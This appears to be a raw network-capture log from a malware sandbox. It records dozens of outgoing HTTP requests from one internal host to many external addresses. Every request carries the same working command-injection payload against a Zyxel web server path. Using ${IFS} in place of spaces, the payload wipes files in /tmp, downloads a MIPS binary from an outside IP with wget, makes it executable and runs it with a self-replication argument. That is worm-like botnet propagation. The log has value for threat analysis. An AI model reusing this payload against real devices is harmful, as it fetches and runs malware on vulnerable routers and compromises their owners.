                                                        Jan 28, 2024 10:12:53.424415112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4631192.168.2.143713695.211.221.35443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.424448967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4632192.168.2.1459158169.132.215.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.424504042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4633192.168.2.1457512126.251.247.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.424525976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4634192.168.2.1434166199.64.26.142443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.424560070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4635192.168.2.1439958178.138.77.219443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.424598932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4636192.168.2.145191489.239.226.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.424638033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4637192.168.2.1443350222.189.239.91443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.424652100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4638192.168.2.143571881.187.123.46443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.424690008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4639192.168.2.145524063.6.135.235443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.424726009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4640192.168.2.1451734155.4.37.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.424772024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4641192.168.2.1441092183.100.207.193443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.424825907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4642192.168.2.145195632.185.108.170443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.424870014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4643192.168.2.1447788156.120.60.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.424911976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4644192.168.2.1444340100.210.43.226443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.424926996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4645192.168.2.1436958107.20.154.192443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.424973011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4646192.168.2.143955623.77.158.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.425019979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4647192.168.2.146063060.242.205.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.425065041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4648192.168.2.1457726204.236.7.60443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.425103903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4649192.168.2.1445546205.185.55.81443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.425151110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4650192.168.2.144481071.49.10.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.425173998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4651192.168.2.143870058.105.73.124443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.425196886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4652192.168.2.1460446174.163.25.164443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.425239086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4653192.168.2.1455726171.26.122.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.425260067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4654192.168.2.144279254.138.126.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.425288916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4655192.168.2.143549286.204.35.107443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.425339937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4656192.168.2.1444680131.133.119.115443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.425368071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4657192.168.2.1439510217.81.235.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.425414085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4658192.168.2.145497699.240.143.103443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.425446987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4659192.168.2.1438476220.164.188.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.425493002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4660192.168.2.1453888157.229.251.158443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.425539017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4661192.168.2.1448174125.147.43.238443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.425584078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4662192.168.2.1458130107.87.243.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.425611019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4663192.168.2.144428848.163.225.247443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.425661087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4664192.168.2.1445244146.233.42.118443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.425700903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4665192.168.2.145735845.167.235.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.425714970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4666192.168.2.143398483.154.21.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.425765991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4667192.168.2.1437464164.235.128.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.425806046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4668192.168.2.143649673.20.167.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.425832033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4669192.168.2.1438794124.121.48.170443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.425880909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4670192.168.2.1444490205.25.198.239443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.425915956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4671192.168.2.145926487.134.134.42443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.425955057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4672192.168.2.1441640163.114.151.163443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.425997972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4673192.168.2.1436914201.159.59.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.426029921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4674192.168.2.1452566199.7.37.75443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.426076889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4675192.168.2.1433650157.42.111.84443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.426109076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4676192.168.2.14478082.152.153.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.426153898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4677192.168.2.1442718158.88.179.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.426192045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4678192.168.2.145574076.95.52.50443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.426218033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4679192.168.2.144868495.212.254.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.426243067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4680192.168.2.143587071.184.234.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.426271915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4681192.168.2.1444644132.71.237.60443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.426311970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4682192.168.2.1432884103.254.112.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.426352024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4683192.168.2.1436818143.28.56.184443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.426400900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4684192.168.2.144101280.38.185.190443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.426429033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4685192.168.2.1434520109.240.115.156443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.426470995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4686192.168.2.1458604148.223.169.60443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.426498890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4687192.168.2.145716619.77.96.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.426527977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4688192.168.2.1436442121.162.125.28443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.426584005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4689192.168.2.1453028219.205.48.215443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.426634073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4690192.168.2.1459740121.94.66.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.426672935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4691192.168.2.1439172126.236.249.161443
                                                        TimestampBytes transferredDirectionData
